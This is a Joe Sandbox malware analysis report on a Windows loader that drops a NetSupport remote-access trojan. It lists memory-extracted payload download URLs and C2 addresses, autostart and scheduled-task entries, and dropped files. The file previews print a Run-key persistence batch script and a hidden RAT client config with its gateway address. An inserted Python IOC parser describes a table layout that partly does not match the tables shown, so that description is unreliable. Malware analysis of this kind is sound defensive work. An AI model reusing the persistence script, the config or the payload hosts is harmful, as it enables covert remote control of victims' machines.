http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535 | D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | false | |
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng | 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | false | |
https://lev-tolstoi.com/u/ | 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmp | false | |
https://MD8.mozilla.org/1/m | D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECF0000.00000004.00001000.00020000.00000000.sdmp | false | |
https://lev-tolstoi.com/eK | 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmp | false | |
https://www.bbc.co.uk/ | D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmp | false | |
http://185.215.113.16/off/random.exe/ | skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp | false | |
https://lev-tolstoi.com/api | 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3045357571.0000000001365000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmp | false | |
https://api.gofile.io/getServerr=r | D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | false | |
https://bugzilla.mo | D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECF0000.00000004.00001000.00020000.00000000.sdmp | false | |
http://tools.ietf.org/html/rfc6125#section-6.4.3 | D1UL0FG.exe, 00000006.00000002.2997186323.000001FA2E940000.00000004.00001000.00020000.00000000.sdmp | false | |
http://www.symauth.com/rpa00 | m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | |
http://31.41.244.11/files/geopoxid/random.exe | skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp | false | |
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z | skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | false | |
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000011.00000002.2659507683.0000028A8581A000.00000004.00000800.00020000.00000000.sdmp | false | |
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am | 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | false | |
https://www.google.com/recaptcha/ | 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp | false | |
https://checkout.steampowered.com/ | 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp | false | |
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL | D1UL0FG.exe, 00000006.00000003.2562812810.000001FA2E5A9000.00000004.00000020.00020000.00000000.sdmp | false | |
http://31.41.244.11/files/unique1/random.exe | skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp | false | |
                                                                                                                                                                                                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref8ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          http://185.215.113.43/Zu7JuNko/index.phpdedskotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://google.com/mailD1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74778ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://deafeninggeh.biz/apiz18ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2712485974.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmD1UL0FG.exe, 00000006.00000003.2483191115.000001FA2E348000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://www.iqiyi.com/D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpfalse
[IP geolocation map (image not extracted); legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs]
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.43 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
104.21.66.86 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.217.19.227 | unknown | United States | 15169 | GOOGLEUS | false
185.215.113.64 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | false
172.67.180.113 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.67.68.212 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.21.23.76 | unknown | United States | 13335 | CLOUDFLARENETUS | false
185.215.113.16 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | false
208.95.112.1 | unknown | United States | 53334 | TUT-ASUS | false
149.154.167.220 | unknown | United Kingdom | 62041 | TELEGRAMRU | false
23.55.153.106 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
104.131.68.180 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false
178.62.201.34 | unknown | European Union | 14061 | DIGITALOCEAN-ASNUS | false
31.41.244.11 | unknown | Russian Federation | 61974 | AEROEXPRESS-ASRU | false
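The IP table and the URL-from-memory table in this report are flattened by extraction: each IP row is spread over three lines, and in each URL row the source process name is glued directly onto the end of the URL. The following Python is an added example, not part of the Joe Sandbox report, that rebuilds a few rows copied from this page into IOC records and correlates the IP-literal URL hosts against the table's Malicious flag. The layout rules it relies on (three lines per IP row, the process-name list used to find the end of the URL, a literal "unknown" Domain column, URLs cut at 100 characters) are assumptions about how this page was flattened, not documented Joe Sandbox behaviour.

```python
"""Rebuild the flattened Joe Sandbox IP and URL tables into IOC records.

Added example, not part of the Joe Sandbox report. The rows below are copied
from this report as extraction left them. The layout rules (three lines per
IP row, source process name glued to the URL, URLs cut at 100 characters, a
literal "unknown" Domain column) are assumptions about the flattening.
"""
import ipaddress
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Flattened IP table rows copied from this report (IP / Domain+Country / ASN+Name+Malicious).
IP_ROWS = """\
185.215.113.43
unknownPortugal
206894WHOLESALECONNECTIONSNLtrue
104.21.66.86
unknownUnited States
13335CLOUDFLARENETUSfalse
31.41.244.11
unknownRussian Federation
61974AEROEXPRESS-ASRUfalse
"""

# Flattened URL rows copied from this report.
URL_ROWS = [
    "http://185.215.113.43/Zu7JuNko/index.phpdedskotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://31.41.244.11/files/geopoxid/random.exeskotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://deafeninggeh.biz/apiz18ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref8ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpfalse",
]

# Process names seen in this report; the URL column ends where one of them starts (assumption).
PROCESS_NAMES = ["skotes.exe", "8ZVMneG.exe", "D1UL0FG.exe", "powershell.exe", "d0ef52de9f.exe"]
URL_MAX_LEN = 100  # assumed truncation length of the URL column

_PROC = "|".join(re.escape(p) for p in PROCESS_NAMES)
_DUMP = r"[0-9A-F.]+\.sdmp"
_URL_ROW = re.compile(
    rf"^(?P<url>.+?)(?P<source>(?:{_PROC}), {_DUMP}(?:, (?:{_PROC}), {_DUMP})*)(?P<mal>true|false)$"
)
_ASN_LINE = re.compile(r"^(?P<asn>\d+)(?P<name>.+?)(?P<mal>true|false)$")


@dataclass
class IpRecord:
    ip: str
    domain: str
    country: str
    asn: int
    asn_name: str
    malicious: bool


@dataclass
class UrlRecord:
    url: str
    processes: list
    truncated: bool
    malicious: bool


def parse_ip_rows(text: str) -> list:
    """Each IP row spans three lines: IP, Domain+Country, ASN+ASN Name+Malicious."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 3:
        raise ValueError("IP table is not a multiple of three lines")
    records = []
    for i in range(0, len(lines), 3):
        ip, dom_country, asn_line = lines[i:i + 3]
        ipaddress.ip_address(ip)  # raises ValueError if the rows are misaligned
        # Only a literal "unknown" domain can be split from the country without
        # a country list; anything else is reported instead of guessed.
        if not dom_country.startswith("unknown"):
            raise ValueError(f"cannot split domain/country in {dom_country!r}")
        m = _ASN_LINE.match(asn_line)
        if not m:
            raise ValueError(f"bad ASN line {asn_line!r}")
        records.append(IpRecord(ip, "unknown", dom_country[len("unknown"):],
                                int(m["asn"]), m["name"], m["mal"] == "true"))
    return records


def parse_url_rows(rows) -> list:
    """Split URL, source process(es) and Malicious flag; trailing memory bytes stay on the URL."""
    records = []
    for row in rows:
        m = _URL_ROW.match(row.strip())
        if not m:
            raise ValueError(f"unparsed URL row: {row[:60]!r}...")
        procs = list(dict.fromkeys(re.findall(_PROC, m["source"])))  # unique, in order
        url = m["url"]
        records.append(UrlRecord(url, procs, len(url) >= URL_MAX_LEN, m["mal"] == "true"))
    return records


def correlate(ip_records, url_records) -> dict:
    """Map each IP-literal URL host to the IP table's Malicious flag and the URLs seen on it."""
    flags = {r.ip: r.malicious for r in ip_records}
    out = {}
    for u in url_records:
        host = urlsplit(u.url).hostname
        try:
            ipaddress.ip_address(host)
        except (ValueError, TypeError):
            continue  # hostnames would need DNS; skipped offline
        entry = out.setdefault(host, {"malicious": flags.get(host, False), "urls": []})
        entry["urls"].append(u.url)
    return out


if __name__ == "__main__":
    for host, info in correlate(parse_ip_rows(IP_ROWS), parse_url_rows(URL_ROWS)).items():
        print(host, "malicious" if info["malicious"] else "unflagged", info["urls"])
```

Note that the correlation only reports what the table says: 31.41.244.11 serves the random.exe payloads but is flagged false in this report, so a blocklist built from the Malicious column alone would miss it; the payload hosts are worth reviewing by hand.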
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578555
Start date and time: 2024-12-19 22:09:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 20m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 112
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@187/113@0/14
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Skipping network analysis since amount of network traffic is too extensive
• VT rate limit hit for: file.exe
Time | Type | Description
16:10:21 | API Interceptor | 15333443x Sleep call for process: skotes.exe modified
16:10:44 | API Interceptor | 166x Sleep call for process: powershell.exe modified
16:10:46 | API Interceptor | 2x Sleep call for process: WMIC.exe modified
16:10:57 | API Interceptor | 13x Sleep call for process: 8ZVMneG.exe modified
16:11:11 | API Interceptor | 8x Sleep call for process: d0ef52de9f.exe modified
16:11:16 | API Interceptor | 16x Sleep call for process: d188864e84.exe modified
16:11:31 | API Interceptor | 13568451x Sleep call for process: FuturreApp.exe modified
22:10:14 | Task Scheduler | Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
22:12:05 | Task Scheduler | Run new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
22:12:43 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run f8645e1e85.exe C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe
22:12:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fde98a8d0b.exe C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exe
22:13:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 67fbb282d1.exe C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exe
22:13:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run f7b3852b06.exe C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exe
22:13:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run f8645e1e85.exe C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe
22:13:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fde98a8d0b.exe C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exe
22:13:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 67fbb282d1.exe C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exe
22:13:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run f7b3852b06.exe C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exe
22:13:55 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApproximateSize.vbs
22:16:59 | Task Scheduler | Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
Process: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 105848
Entropy (8bit): 4.68250265552195
Encrypted: false
SSDEEP: 384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
MD5: 8D9709FF7D9C83BD376E01912C734F0A
SHA1: E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
SHA-256: 49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
SHA-512: 042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
Malicious: true
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\FuturreApp.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 29%
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 328056
Entropy (8bit): 6.754723001562745
Encrypted: false
SSDEEP: 6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
MD5: 2D3B207C8A48148296156E5725426C7F
SHA1: AD464EB7CF5C19C8A443AB5B590440B32DBC618F
SHA-256: EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
SHA-512: 55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
Malicious: true
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\HTCTL32.DLL, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 257
Entropy (8bit): 5.119720931145611
Encrypted: false
SSDEEP: 6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
MD5: 7067AF414215EE4C50BFCD3EA43C84F0
SHA1: C331D410672477844A4CA87F43A14E643C863AF9
SHA-256: 2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
SHA-512: 17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
Malicious: false
Reputation: unknown
Preview: 1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
Process: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 18808
Entropy (8bit): 6.22028391196942
Encrypted: false
SSDEEP: 192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
MD5: A0B9388C5F18E27266A31F8C5765B263
SHA1: 906F7E94F841D464D4DA144F7C858FA2160E36DB
SHA-256: 313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
SHA-512: 6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
Malicious: true
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICHEK.DLL, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Reputation: unknown
Process: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3735416
Entropy (8bit): 6.525042992590476
Encrypted: false
SSDEEP: 49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
MD5: 00587238D16012152C2E951A087F2CC9
SHA1: C4E27A43075CE993FF6BB033360AF386B2FC58FF
SHA-256: 63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
SHA-512: 637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                                                                                        Reputation:unknown
Preview: (PE header dump, not reproduced; recoverable section names: .text, .rdata, .data, .tls, .hhshare, .rsrc, .reloc)
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):396664
                                                                                                                                                                                                                                        Entropy (8bit):6.809064783360712
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                                                                                                                                                                        MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                                                                                                                                                                        SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                                                                                                                                                                        SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                                                                                                                                                                        SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\TCCTL32.DLL, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                        Reputation:unknown
Preview: (PE header dump, not reproduced; recoverable section names: .text, .rdata, .data, .rsrc, .reloc)
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):300
                                                                                                                                                                                                                                        Entropy (8bit):5.131775788834825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:hwszH1j0KpIAgidquHGjCscfoZH1j0KpIAgidquHGjCsW/jCE:HVj0KprgidqugI+Vj0KprgidqugUrX
                                                                                                                                                                                                                                        MD5:6C49E627C4228F1D9776C78749D2DDCB
                                                                                                                                                                                                                                        SHA1:0241B8E0073116C0F738BB0721C68F6B951AE7C6
                                                                                                                                                                                                                                        SHA-256:D32A160B8DC638589A30EFFB82DC33AFDA3F8CD2A1E7789FE147439C2872BAA9
                                                                                                                                                                                                                                        SHA-512:DBCFD98FFF31C4D555A8D61EB95660A04E9BE79079DD741C11874005DE443694A8425A5434056F1E5722911628359B0A812E9D6C6D030F32477973FCA870880D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
Preview (line breaks restored):
@echo off
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\FuturreApp.exe"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\FuturreApp.exe"
start %Public%\Netstat\FuturreApp.exe
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):702
                                                                                                                                                                                                                                        Entropy (8bit):5.536854980364518
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:YTNWqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuh6IAlkz6:yWqzEmPZly6YBlLoG1fXXfDiU6IAaz6
                                                                                                                                                                                                                                        MD5:A4AA9219BECDEEC09159270BB041BB35
                                                                                                                                                                                                                                        SHA1:2D08305017EFB0A1FF7DEFDF66DB80191ED9CCF8
                                                                                                                                                                                                                                        SHA-256:277B9BCB5778CD5DC167ED75528818B06ED12F3FD427339F3085F4DB8A39ED2E
                                                                                                                                                                                                                                        SHA-512:4F7CE001DA009FCBA0C5BEAB572A16306D56FD91253C45D5196892142DA78EC805982A4E1C136AD61471B5A951697EED76F9EE63D8B94EB64024A11E0FD0DE42
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
Preview (line breaks restored):
0x58095535

[Client]
_present=1
DisableChatMenu=1
DisableClientConnect=1
DisableDisconnect=1
DisableLocalInventory=1
DisableReplayMenu=1
DisableRequestHelp=1
HideWhenIdle=1
Protocols=3
RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA
RoomSpec=Eval
ShowUIOnConnect=0
silent=1
SKMode=1
SOS_Alt=0
SOS_LShift=0
SOS_RShift=0
SysTray=0
UnloadMirrorOnDisconnect=1
Usernames=*

[_Info]
Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini

[_License]
quiet=1

[Audio]
DisableAudioFilter=1

[General]
BeepUsingSpeaker=0

[HTTP]
GatewayAddress=185.215.113.64:443
gsk=EFHH;K>OBDEJ9A<I@BCB
gskmode=0
gsku=EFHH;K>OBDEJ9A<I@BCB
GSKX=EFHH;K>OBDEJ9A<I@BCB
